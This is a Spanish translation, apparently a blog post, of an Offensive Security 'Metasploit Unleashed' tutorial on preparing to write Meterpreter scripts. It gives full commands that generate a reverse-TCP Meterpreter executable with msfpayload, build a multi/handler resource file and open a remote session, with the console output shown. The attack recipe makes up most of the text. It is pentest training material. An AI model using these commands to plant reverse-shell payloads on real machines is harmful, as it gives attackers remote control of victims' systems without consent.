Escribiendo Script Meterpreter
Hay algunas cosas que necesitas tener en mente al crear un script meterpreter nuevo.
* No todas las versiones de Windows son los mismo.
* Algunas versiones de Windows tienen las contramedidas de seguridad para algunos de los comandos
* No todas las herramientas de línea de comandos se encuentran en todas las versiones de Windows.
* Algunas de las herramientas de línea de comando varían dependiendo de la versión de Windows
En pocas palabras, las mismas limitaciones que tiene cuando se trabaja con métodos de explotación estándar. MSF puede ser de gran ayuda, pero no puede cambiar los fundamentos de ese objetivo. Teniendo esto en cuenta puede ahorrar un montón de frustración en el camino. Así que sigue la versión de su blanco y el Service Pack de Windows en mente, y construir al mismo.
Para nuestros propósitos, vamos a crear una independiente binaria que se ejecuta en el sistema de destino que va a crear un shell inversa Meterpreter de vuelta a nosotros. Esto descarta cualquier problema con un exploit a medida que trabajamos a través de nuestro desarrollo de guiones.
root@bt4:~# cd /pentest/exploits/framework3/
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.184 X > Meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 310
Options: LHOST=192.168.1.184
Maravilloso. Ahora, movemos el ejecutable para nuestra máquina Windows que será nuestro objetivo para el guión que vamos a escribir. Sólo tenemos que crear nuestro oyente. Para ello, vamos a crear un pequeño script para poner en marcha múltiples controlador para nosotros.
root@bt4:/pentest/exploits/framework3# touch meterpreter.rc
root@bt4:/pentest/exploits/framework3# echo use exploit/multi/handler >> meterpreter.rc
root@bt4:/pentest/exploits/framework3# echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
root@bt4:/pentest/exploits/framework3# echo set LHOST 192.168.1.184 >> meterpreter.rc
root@bt4:/pentest/exploits/framework3# echo set ExitOnSession false >> meterpreter.rc
root@bt4:/pentest/exploits/framework3# echo exploit -j -z >> meterpreter.rc
root@bt4:/pentest/exploits/framework3# cat meterpreter.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.184
set ExitOnSession false
exploit -j -z
Aquí estamos utilizando el exploit multi handler para recibir nuestro payload, se especifica que el payload es un PAYLOAD reverse_tcp Meterpreter, se establece EL PAYLOAD, nos aseguramos de que el controlador de SESIONES no salga una vez que reciba un período de sesiones ya que podría necesitar volver a establecer si se causa un error o puede ser que se de, de acuerdo a las pruebas con versiones diferentes de Windows desde sistemas objetivos diferentes.
Mientras trabajaba en los script, vamos a guardar los scripts de prueba a / pentest/exploits/framework3/scripts/meterpreter para que pueda ser ejecutado.
Ahora, lo único que queda es poner en marcha con nuestros msfconsole nuestra secuencia de comandos de recursos.
root@bt4:/pentest/exploits/framework3# ./msfconsole -r meterpreter.rc
=[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 384 exploits - 231 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 161 aux
resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.1.184
LHOST => 192.168.1.184
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j -z
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...>
Como puede verse arriba, Metasploit está a la escucha de una conexión. Ahora podemos ejecutar nuestro ejecutable en nuestro anfitrión de Windows y vamos a recibir una sesión. Una vez que la sesión se establece, se utiliza el comando de sesiones con el '-i' interruptor y el número del período de sesiones de interactuar con él:
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.104:1043)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
© Offensive Security 2009
Original by www.offensive-security.com/metasploit-unleashed/
Traslated by tundervirld
y listo establecimos una session sin tener mucho trabajo, y podra ser reutilizable.
© Offensive Security 2009
Original by www.offensive-security.com/metasploit-unleashed/
Traslated by tundervirld
No hay comentarios:
Publicar un comentario